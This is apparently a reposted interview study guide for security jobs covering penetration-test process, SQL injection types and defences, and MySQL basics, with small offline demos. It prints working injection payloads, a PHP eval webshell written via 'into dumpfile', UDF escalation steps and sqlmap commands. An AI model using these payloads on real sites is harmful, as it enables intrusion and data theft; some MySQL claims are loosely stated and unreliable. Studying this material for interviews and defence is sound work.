Network security autumn recruitment interview questions (with answers)

Self-introduction
Have you ever dug for SRC (vendor security response center) bounties?
How do you usually learn web penetration? Any real-world practice? Have you ever successfully found a vulnerability?
What tools have you used when doing web penetration?
What is an XXE vulnerability? What is SSRF?
What direction are you responsible for when playing CTF?
How do you judge whether a database is MySQL or Oracle?
What are the types of SQL injection and how do you exploit each?
Talk about the principle of SQL injection and ideas for defending against it.
What language do you use for development? What framework do you use for Java development? Can you do secure Java development?
Have you ever done Android development?
Have you ever written tools in Python?
Which vulnerability did you use with MSF, and did you successfully get a reverse shell?
What did you mainly do during the network-protection drill?
Talk about your understanding of security products.
The company now needs people who can do app security. If asked to do it now, would you learn it, are you interested, or is there something else you want to do?
Talk about the approach to intranet penetration.

Interview questions collection

1. Summary of high-frequency interview questions at major vendors

This time I spent three months sorting out the interview questions for network security service positions at major security vendors (including but not limited to: security service engineer, security operations engineer, security operations and maintenance engineer, security attack-and-defense engineer).

Without further ado, let's learn together.

At present there is still a lot of imprecision and redundancy; I ask friends to correct and improve it!


1.1. SQL injection protection methods
See 1.7 below.

1.2. OWASP Top 10 (2013 edition)
Injection (SQL injection and similar)
Broken authentication and session management
Cross-site scripting (XSS)
Insecure direct object references
Security misconfiguration
Sensitive data exposure
Missing function-level access control
Cross-site request forgery (CSRF)
Using components with known vulnerabilities
Unvalidated redirects and forwards

Penetration testing is hands-on work, but many people cannot explain it when asked.

1.3. Given a website, how would you conduct a penetration test? (On the premise of having obtained written authorization.)
1) Information collection

Obtain the whois information of the domain: the registrant's email address, name, phone number, etc.
Enumerate other sites on the same server and sub-domain sites; the main site is usually harder, so first check whether the side sites run a common CMS or have other known holes.
Identify the server operating system version and the web middleware and check for known vulnerabilities, such as the IIS, Apache and Nginx parsing vulnerabilities.
Resolve the IP, port-scan it, and probe the services behind each port: rsync, Heartbleed, MySQL, FTP, SSH weak passwords, etc.
Scan the website directory structure for directory listing or leaked sensitive files (a php probe page, for example); use Google hacking to further discover site information, the admin back-end and sensitive files.

2) Vulnerability scanning

Probe for vulnerabilities such as XSS, CSRF, SQL injection, code execution, command execution, unauthorized access, directory traversal, arbitrary file read and download, file inclusion, remote command execution, weak passwords, file upload, editor vulnerabilities, brute force, etc.

3) Exploitation

Use the findings above to obtain a webshell or some other form of access.

4) Privilege Escalation

Escalate privileges on the server: for example MySQL UDF privilege escalation on Windows, Serv-U privilege escalation, vulnerabilities in older Windows versions (IIS 6, the pr and Churrasco token-kidnapping tools, the latter known in Chinese circles as "Brazilian barbecue"), Dirty COW on Linux, Linux kernel version exploits, MySQL system-level privilege escalation on Linux, and Oracle low-privilege escalation.

5) Log cleaning (in an authorized engagement, only if the rules of engagement explicitly allow it)

6) Summary report and repair plan

1.4. Penetration testing process
Project interview (kickoff)
Information collection: whois, the site's real IP, side sites, C-segment sites, server OS version, container version, program version, database type, second-level domains, firewall, maintainer information
Vulnerability scanning: Nessus, AWVS
Manual mining: logical vulnerabilities
Verify the vulnerabilities
Repair suggestions (if any)
Baseline inspection / re-test of vulnerabilities
Output the report:
  Overview
  Basic information of the test: test scope, test time, test tasks, test process
  Comprehensive analysis of information security risks: overall risk analysis, risk impact analysis, system security analysis
  Security vulnerability list
  Solution suggestions
  Retest report

SQL interview questions

1.5. Types of SQL injection
Error-based injection: the database error message carries the query result back to the page.
Boolean-based blind injection: judge whether a condition is true or false from the returned page.
Time-based blind injection: the page content gives nothing away, so use a conditional statement around a delay (sleep) and check whether the response time increases.
Wide-byte injection: a multi-byte connection charset such as GBK swallows the escaping backslash.
Union injection: append a UNION SELECT to read other tables.
Stacked queries: the interface executes several statements at once, separated by semicolons.

1.6. The principle of SQL injection
By inserting SQL commands into web form submissions, or into the query string of a domain name or page request, the attacker finally tricks the server into executing malicious SQL. The usual cause is user input that is not checked, or is checked insufficiently, being concatenated into the query text, so that what should be data is accidentally executed as code.

 

1.7. How to defend against SQL injection
Turn off application error messages.
Add a WAF to filter input.
Limit input length.
Limit database privileges; grant DROP/CREATE/TRUNCATE only with care.
Use prepared (precompiled) statements, generally with ? as the placeholder in Python and PHP. This addresses injection from the programming-framework side by sending parameters separately from the statement text; it prevents injection for the values it binds, but identifiers (table or column names, ORDER BY) cannot be bound, and other sinks such as buffer overflows and terminating characters still need handling.
Encrypt and protect the information in the database (this leads into cryptography). Do not store plain MD5 hashes because of rainbow tables; the usual answer is to add a salt after MD5 and hash again, though a slow password hash (bcrypt, scrypt, Argon2) is the better choice today.
Clear coding standards, pair/automated code review, and the many mature off-the-shelf solutions (PreparedStatement, ActiveRecord, filtering of ambiguous characters, exposing only stored procedures, and so on) have made the risk of SQL injection very low.
Be ready for the follow-up: how to prevent injection in a specific language, and which security framework is used.
1.8. How is sqlmap used, and how do you attack an injection point with it?
If it is a GET injection point: sqlmap -u "injection point URL".
If it is a POST injection point: sqlmap -u "injection point URL" --data="post parameters".
If the injection is in a cookie, X-Forwarded-For or another header: capture the request with Burp Suite, mark the injection position with *, save the request to a file, and run sqlmap -r "file path".

1.9. For MySQL injection, what is the difference between versions above 5.0 and below 5.0?
5.0 was released over ten years ago and the current line is 5.7, so in practice the question is moot.
Below 5.0 there is no information_schema system database, so table and column names cannot be enumerated and must be brute-forced.
Below 5.0 is multi-user single-operation; above 5.0 is multi-user multi-operation.
1.10. MySQL storage engines?
1. InnoDB: the mainstream storage engine. Supports transactions, row locks, non-locking reads and foreign-key constraints.

Provides MySQL with a transaction-safe (ACID-compliant) storage engine with commit, rollback and crash-recovery capabilities. InnoDB locks at the row level and also provides Oracle-like non-locking reads in SELECT statements. These features improve multi-user deployment and performance. In SQL queries you can freely mix InnoDB tables with other MySQL table types, even in the same query. The InnoDB storage engine maintains its own buffer pool for caching data and indexes in main memory. InnoDB stores its tables and indexes in a logical tablespace, which can consist of several files (or raw disk partitions). This differs from MyISAM, where each table is stored in separate files. InnoDB tables can be of any size, even on operating systems where file size is limited to 2 GB.
InnoDB supports foreign-key integrity constraints. Rows are stored in primary-key order; if no primary key is specified in the table definition, InnoDB generates a 6-byte ROWID for each row and uses it as the primary key.
3. MEMORY: keeps the table's data in memory; concurrency performance is poor.
4. MERGE, Archive, etc.: not commonly used.

1.11. What is a transaction?
A transaction is a set of atomic SQL statements, that is, an independent unit of work. If the database engine can apply the whole set to the database, it commits them; if any statement cannot be executed, due to a crash or any other reason, none of them take effect. In other words, the statements in a transaction either all succeed or all fail.
A typical example of a banking application:

Suppose the bank's database has two tables: a check table and a savings table. Now a customer A wants to transfer 2,000 yuan from his checking account to his savings account, then at least three steps are required:

a. Check that the balance of A's checking account is higher than 2,000 yuan;

b. Subtract 2,000 yuan from A's checking account balance;

c. Add 2,000 yuan to A's savings account balance.

 

These three steps must be packaged in one transaction. If any step fails, all steps must be rolled back. Otherwise, A, as a bank customer, may inexplicably lose 2,000 yuan, and something goes wrong. This is a typical transaction. This transaction is the smallest indivisible unit of work. All operations in the entire transaction are either submitted successfully or rolled back if they fail. It is impossible to execute only part of them. This is also the atomic feature of a transaction.
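The transfer above as runnable code, added here as an example; it is not from the original post. It uses Python's standard-library sqlite3 module with constructed balances; the table names, the CHECK constraint and the simulate_crash flag (which stands in for a crash between steps b and c) are assumptions made for the demo.

```python
"""Added example (not from the original post): the bank transfer as one
transaction. Either all three steps commit, or the failing step rolls the
others back and both balances are untouched. Data is constructed here."""
import sqlite3


def make_bank():
    conn = sqlite3.connect(":memory:")
    conn.isolation_level = None  # we issue BEGIN/COMMIT/ROLLBACK explicitly
    # CHECK constraint is defence in depth: the DB itself refuses a negative balance
    conn.execute("CREATE TABLE checking (owner TEXT PRIMARY KEY, balance INTEGER CHECK (balance >= 0))")
    conn.execute("CREATE TABLE savings  (owner TEXT PRIMARY KEY, balance INTEGER CHECK (balance >= 0))")
    conn.execute("INSERT INTO checking VALUES ('A', 2500)")  # constructed opening balances (yuan)
    conn.execute("INSERT INTO savings  VALUES ('A', 100)")
    return conn


def balances(conn, owner):
    c = conn.execute("SELECT balance FROM checking WHERE owner=?", (owner,)).fetchone()[0]
    s = conn.execute("SELECT balance FROM savings  WHERE owner=?", (owner,)).fetchone()[0]
    return c, s


def transfer(conn, owner, amount, simulate_crash=False):
    """Move `amount` from checking to savings atomically. Returns True on commit."""
    conn.execute("BEGIN IMMEDIATE")  # take the write lock before reading the balance
    try:
        # step a: the check happens inside the transaction, so nobody can
        # change the balance between the check and the debit
        (bal,) = conn.execute("SELECT balance FROM checking WHERE owner=?", (owner,)).fetchone()
        if bal < amount:
            raise ValueError("insufficient funds")
        # step b: debit checking
        conn.execute("UPDATE checking SET balance = balance - ? WHERE owner=?", (amount, owner))
        if simulate_crash:
            raise RuntimeError("server died between step b and step c")
        # step c: credit savings
        conn.execute("UPDATE savings SET balance = balance + ? WHERE owner=?", (amount, owner))
        conn.execute("COMMIT")
        return True
    except Exception:
        # any failure undoes every step already applied, including the debit
        conn.execute("ROLLBACK")
        return False


if __name__ == "__main__":
    bank = make_bank()
    print("start        ", balances(bank, "A"))
    print("3000 -> ", transfer(bank, "A", 3000), balances(bank, "A"))
    print("crash -> ", transfer(bank, "A", 2000, simulate_crash=True), balances(bank, "A"))
    print("2000 -> ", transfer(bank, "A", 2000), balances(bank, "A"))
```

The simulated crash is the case the paragraph is about: the debit has already been applied when the failure happens, and only the rollback keeps A from losing 2,000 yuan.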

1.12. Read locks and write locks
Read locks are shared, that is, they do not block each other, and multiple clients can read the same resource at the same time without interfering with each other. Write locks are exclusive, that is, a write lock will block other write locks and read locks. Only in this way can it be ensured that only one user can perform writing within a given time, preventing other users from reading the same resource being written. Write locks have higher priority than read locks.

1.13. MySQL index
An index is a data structure that helps MySQL retrieve data efficiently. MyISAM and InnoDB only let you declare B-tree indexes (InnoDB also keeps an adaptive hash index internally, but it cannot be declared); MEMORY/HEAP tables support both HASH and BTREE indexes.


1.14. ORDER BY injection: ORDER BY accepts a column name, an expression or a column position, and the position must be an integer. Because these are identifiers rather than values, they cannot be bound as prepared-statement parameters, so the sort key must be validated against a fixed allow-list.
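As an added example for 1.7 and 1.14 (not code from the original post), the following Python shows the string-concatenated login query beside its parameterized form, and an allow-list for the ORDER BY column, which cannot be bound as a parameter. The table, the sample rows and the allow-list are assumptions constructed for the demo; it runs offline on the standard-library sqlite3 module, where the placeholder is ? just as the text says.

```python
"""Added example (not from the original post): injectable vs. parameterized
query, plus allow-listing for ORDER BY. sqlite3, constructed data."""
import sqlite3

# sort columns the application is willing to accept (assumed for the demo)
ALLOWED_ORDER_COLUMNS = {"id", "username"}


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users (username, password) VALUES (?, ?)",
                     [("admin", "s3cr3t"), ("alice", "hunter2"), ("bob", "passw0rd")])
    return conn


def login_vulnerable(conn, username, password):
    # user input spliced straight into the statement: the classic injection point
    sql = "SELECT id FROM users WHERE username='%s' AND password='%s'" % (username, password)
    return [row[0] for row in conn.execute(sql)]


def login_safe(conn, username, password):
    # placeholders: the driver hands the values to the engine separately from
    # the statement text, so a quote in the input can never end the literal
    sql = "SELECT id FROM users WHERE username=? AND password=?"
    return [row[0] for row in conn.execute(sql, (username, password))]


def list_users_sorted(conn, order_by):
    # ORDER BY takes an identifier or position, not a bound value, so a
    # placeholder does not apply; reject anything outside the allow-list
    if order_by not in ALLOWED_ORDER_COLUMNS:
        raise ValueError("unexpected sort column: %r" % order_by)
    return [row[0] for row in conn.execute("SELECT username FROM users ORDER BY " + order_by)]


if __name__ == "__main__":
    db = make_db()
    payload = "' OR '1'='1"
    print("vulnerable:", login_vulnerable(db, payload, payload))  # every user id
    print("safe:      ", login_safe(db, payload, payload))        # nothing
    print(list_users_sorted(db, "username"))
```

With the payload in both fields the vulnerable statement becomes WHERE username='' OR '1'='1' AND password='' OR '1'='1', which is true for every row; the bound version compares the whole string literally and matches nobody.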

1.15. What is GPC? How do you bypass it when GPC is on?
With magic_quotes_gpc=On, the PHP parser automatically prefixes the escape character "\" to single quotes, double quotes, backslashes and NUL bytes in data arriving via GET, POST and cookies, so that these special characters do not contaminate the program, and database statements in particular. (The feature was deprecated in PHP 5.3 and removed in PHP 5.4.) Typical bypasses: numeric injection points, which need no quotes at all since only quotes and backslashes are escaped; and wide-byte injection, where a multi-byte connection charset such as GBK lets a preceding high byte (for example %bf) absorb the added backslash into one two-byte character, leaving the quote intact.
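The wide-byte bypass in code, added here as an example and not part of the original post. The addslashes function is a byte-level emulation of PHP's addslashes() written for this demo, the query template and the payload %bf%27 are constructed, and "the database's view" is simulated by decoding the statement bytes in the connection charset, which is what the server does before parsing.

```python
"""Added example (not from the original post): why addslashes/magic_quotes
escaping fails under a multi-byte connection charset (wide-byte injection).
Pure Python, constructed inputs."""


def addslashes(data: bytes) -> bytes:
    """Byte-wise emulation of PHP addslashes(): prefix ' " \\ and NUL with a backslash."""
    out = bytearray()
    for b in data:
        if b in (0x27, 0x22, 0x5C, 0x00):
            out.append(0x5C)
        out.append(b)
    return bytes(out)


def build_query(escaped_name: bytes) -> bytes:
    # the application splices the escaped input into a quoted literal
    return b"SELECT * FROM users WHERE name='" + escaped_name + b"'"


def as_seen_by_db(query: bytes, charset: str) -> str:
    # the server parses the statement in the connection charset, not as raw bytes
    return query.decode(charset, errors="replace")


def quote_escaped(query: bytes, charset: str) -> bool:
    """True if the injected quote is still preceded by a backslash after decoding."""
    return "\\'" in as_seen_by_db(query, charset)


if __name__ == "__main__":
    # attacker sends %bf%27: a high byte immediately followed by a single quote
    payload = b"\xbf\x27 OR 1=1 -- "
    q = build_query(addslashes(payload))
    print(q)
    # utf-8: 0xbf is invalid on its own, the backslash survives, the quote stays escaped
    print("utf-8:", as_seen_by_db(q, "utf-8"), quote_escaped(q, "utf-8"))
    # gbk: 0xbf 0x5c is one valid two-byte character, so the backslash is consumed
    # and the quote that follows closes the literal
    print("gbk  :", as_seen_by_db(q, "gbk"), quote_escaped(q, "gbk"))
```

After escaping, the bytes are BF 5C 27. A GBK-aware parser reads BF 5C as a single character and then meets a bare quote, which is exactly what the escaping was meant to prevent. The fix is not a better escape function but a connection charset that matches the one used for escaping (mysql_set_charset / SET NAMES), or, better, bound parameters.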

1.16. What is the difference between one @ and two @ in MySQL?
@ denotes a user variable, assigned with SET @var1=1.
@@ denotes a system variable, either a global variable (SHOW GLOBAL VARIABLES \G) or a session variable (SHOW SESSION VARIABLES \G).

1.17. Commonly used functions for injection and bypass
1. Boolean-based blind SQL injection

left(database(),1)>'s'
ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=101 --+
ascii(substr((select database()),1,1))=98
ORD(MID((SELECT IFNULL(CAST(username AS CHAR),0x20) FROM security.users ORDER BY id LIMIT 0,1),1,1))>98%23
regexp injection: select user() regexp '^[a-z]';
like injection: select user() like 'ro%'

2. Error-based SQL injection
1) and extractvalue(1, concat(0x7e,(select @@version),0x7e))
2) floor() error: a duplicate-key error from count(*) grouped by concat(<query>, floor(rand(0)*2))
3) and updatexml(1, concat(0x7e,(select @@version),0x7e),1)
4) geometrycollection(): select * from test where id=1 and geometrycollection((select * from(select * from(select user())a)b));
5) multipoint(): select * from test where id=1 and multipoint((select * from(select * from(select user())a)b));
6) polygon(): select * from test where id=1 and polygon((select * from(select * from(select user())a)b));
7) multipolygon(): select * from test where id=1 and multipolygon((select * from(select * from(select user())a)b));
8) linestring(): select * from test where id=1 and linestring((select * from(select * from(select user())a)b));
9) multilinestring(): select * from test where id=1 and multilinestring((select * from(select * from(select user())a)b));
10) exp(): select * from test where id=1 and exp(~(select * from(select user())a));

3. How do you test for time-based (delayed) injection?

if(ascii(substr("hello", 1, 1))=104, sleep(5), 1)

1.18. What do boolean blind injection and time-based injection have in common?
Both recover data one character at a time: each request asks a yes/no question about one character, answered by the page content in one case and by the response delay in the other.
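The character-by-character loop behind the payloads in 1.17 and 1.18, added here as an example (not code from the original post). The target is a locally constructed sqlite3 database that plays the vulnerable site and only reveals whether a record was rendered. sqlite3 spells MySQL's ascii()/substr() as unicode()/substr(), so the payload text differs slightly from the MySQL one-liners above, but the logic (binary search on the code point of each character) is the same. Table, row and the secret value are constructed for the demo.

```python
"""Added example (not from the original post): boolean-based blind extraction
against a constructed sqlite3 'site'. Each oracle call is one HTTP request in
a real attack; the attacker sees only True (record shown) or False."""
import sqlite3


def make_target():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES (1, 'admin', 'Secr3t!')")  # constructed data
    return conn


def page_says_true(conn, user_input: str) -> bool:
    # the 'web app': a numeric id spliced into the query; the response only
    # tells the attacker whether a row came back
    sql = "SELECT username FROM users WHERE id=" + user_input
    return conn.execute(sql).fetchone() is not None


def oracle(conn, subquery: str, pos: int, threshold: int) -> bool:
    """Is the code point of character `pos` of the subquery result > threshold?
    MySQL equivalent: 1 AND ascii(substr((<subquery>),pos,1))>threshold"""
    payload = "1 AND unicode(substr((%s),%d,1))>%d" % (subquery, pos, threshold)
    return page_says_true(conn, payload)


def extract(conn, subquery: str, max_len: int = 64) -> str:
    result = ""
    for pos in range(1, max_len + 1):
        # past the end, substr() gives '' and unicode('') is NULL, so the
        # comparison is never true: that is how the end of the value is detected
        if not oracle(conn, subquery, pos, 0):
            break
        # invariant: char > lo is True, char > hi is False; shrink until hi == char
        lo, hi = 0, 127
        while hi - lo > 1:
            mid = (lo + hi) // 2
            if oracle(conn, subquery, pos, mid):
                lo = mid
            else:
                hi = mid
        result += chr(hi)
    return result


if __name__ == "__main__":
    target = make_target()
    print(extract(target, "SELECT password FROM users WHERE id=1"))
```

Binary search over the ASCII range costs about seven oracle requests per character plus one to detect the end, which is why blind extraction is slow and noisy in server logs; a time-based variant wraps the same comparison in if(..., sleep(5), 1) and replaces page_says_true with a response-time check.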

1.19. How do you get a webshell on a website?
File upload, editing templates in the admin back-end, writing files through SQL injection, command execution, code execution,
and published CMS vulnerabilities: for example the DedeCMS back-end can create script files directly, and WordPress lets you upload a plugin zip archive that contains script files.

1.20. Which functions write files through SQL injection?
select 'one-line shell' into outfile 'path'
select 'one-line shell' into dumpfile 'path'
select '<?php eval($_POST[1]); ?>' into dumpfile 'd:/wwwroot/baidu.com/nvhack.php';
Use forward slashes or doubled backslashes in the path: inside a MySQL string literal a single backslash is an escape character, so 'd:\wwwroot\...' would not name the directory you intend.

1.21. Various questions about writing shells
1. Which functions are used to write shells?

select '<?php phpinfo(); ?>' into outfile 'D:/shelltest.php'
into dumpfile
file_put_contents (from PHP code execution)

2. What if outfile cannot be used?

Write a UDF library with dumpfile and escalate through it: select unhex('hex of udf.dll') into dumpfile 'c:/mysql/mysql server 5.1/lib/plugin/xxoo.dll'; (UDF privilege escalation is described at https://www.cnblogs.com/milantgh/p/5444398.html).

3. What is the difference between dumpfile and outfile?

outfile is meant for exporting table data: it writes one row per line with field terminators and escaping and appends a newline, so it cannot produce a byte-exact binary such as a DLL. dumpfile writes a single row's raw bytes with no terminators or escaping, which is what a binary needs.

4. Can sleep() write a shell?

No. sleep() only delays execution and returns 0; it is used for time-based blind injection, not for writing files.

5. What are the conditions for writing a shell?

The database user has the FILE privilege, and secure_file_priv does not forbid the target directory (recent MySQL versions default to a restrictive setting).
The MySQL process has write permission on the target directory, and you know the absolute path of the web root.
Command execution may be blocked by disable_functions, for example disable_functions=phpinfo,exec,passthru,shell_exec,system,proc_open,popen,curl_exec,curl_multi_exec,parse_ini_file,show_source; it can sometimes still be reached through the dl extension loader or ImageMagick vulnerabilities (https://www.waitalone.cn/imagemagic-bypass-disable_function.html).
open_basedir restricts the files PHP may operate on to a given directory.


1.23. Second-order SQL injection
When the data is first inserted into the database it is only escaped with addslashes or through get_magic_quotes_gpc; the escaping protects that one statement, but what ends up stored is the original string, so the database now holds dirty data.
Once the data is in the database, developers treat it as trusted. When a later query reads the dirty data back and uses it directly, without further checking or handling, second-order SQL injection occurs.

Example: on a dating website the age field is the injection point, and the page shows how many users are the same age as you. Use and 1=1 to confirm the injection point, ORDER BY to count the columns, and UNION SELECT to find which column is echoed.

Dump the databases: group_concat(schema_name) from information_schema.schemata
Dump the tables: group_concat(table_name) from information_schema.tables where table_schema='hhh'
Read the data: concat(flag) from flag
Fix: data read back from the database or from files must be escaped or, better, bound as a parameter, exactly like fresh input.
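The second-order pattern in code, added here as an example and not part of the original post. The registration step stores the username correctly with a bound parameter; the inbox query then trusts the stored value and concatenates it. sqlite3 is used in place of MySQL, and the tables, messages and usernames are constructed for the demo.

```python
"""Added example (not from the original post): second-order SQL injection.
The first use of the input is safe; the second use, reading it back from
the database, is where the injection fires. sqlite3, constructed data."""
import sqlite3


def make_app_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT)")
    conn.execute("CREATE TABLE messages (id INTEGER PRIMARY KEY, owner TEXT, body TEXT)")
    conn.executemany("INSERT INTO messages (owner, body) VALUES (?, ?)",
                     [("admin", "admin-only note"), ("alice", "hi alice")])
    return conn


def register(conn, username: str) -> int:
    # first use: parameterized, so a quote in the name is stored verbatim and harmlessly
    cur = conn.execute("INSERT INTO users (username) VALUES (?)", (username,))
    return cur.lastrowid


def inbox_vulnerable(conn, user_id: int):
    # second use: the value came out of the database, so the developer treats
    # it as clean and concatenates it into the next statement
    (name,) = conn.execute("SELECT username FROM users WHERE id=?", (user_id,)).fetchone()
    sql = "SELECT body FROM messages WHERE owner='%s'" % name
    return [row[0] for row in conn.execute(sql)]


def inbox_fixed(conn, user_id: int):
    # data coming out of the database is still data: bind it as well
    (name,) = conn.execute("SELECT username FROM users WHERE id=?", (user_id,)).fetchone()
    return [row[0] for row in conn.execute("SELECT body FROM messages WHERE owner=?", (name,))]


if __name__ == "__main__":
    db = make_app_db()
    attacker = register(db, "x' OR '1'='1")   # stored exactly as typed
    print("vulnerable:", inbox_vulnerable(db, attacker))  # every user's messages
    print("fixed:     ", inbox_fixed(db, attacker))       # nothing, no such owner
```

Nothing in the registration path looks wrong, which is why scanners and reviewers that only follow request parameters miss this class; the sink is a query whose input is another query's output.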

1.24. The difference between SQL and NoSQL
SQL: relational databases. NoSQL (Not only SQL): non-relational databases.

1. Advantages of SQL

A relational database represents data with the relational mathematical model; data is described in the form of two-dimensional tables.
Stable structure that is not easy to modify; commonly used for joined-table queries.
Strong query capability; can perform very complex queries.
High consistency; data processing uses locking to ensure data is not changed underneath a transaction.
Tables are logical and easy to understand.

2. Disadvantages of SQL

Not suitable for highly concurrent reads and writes.
Not suitable for efficient reading and writing of massive data.
Rigid layering and low scalability.
High cost of maintaining consistency.
Joined-table queries are complex and slow.

3. Advantages of NoSQL

Stores data as key-value pairs.
Since there are no relations between records, it is easy to scale out and to query.
Flexible data structure; each record can have a different structure.
Lower consistency requirements allow faster queries.


Origin blog.csdn.net/jazzz98/article/details/131831326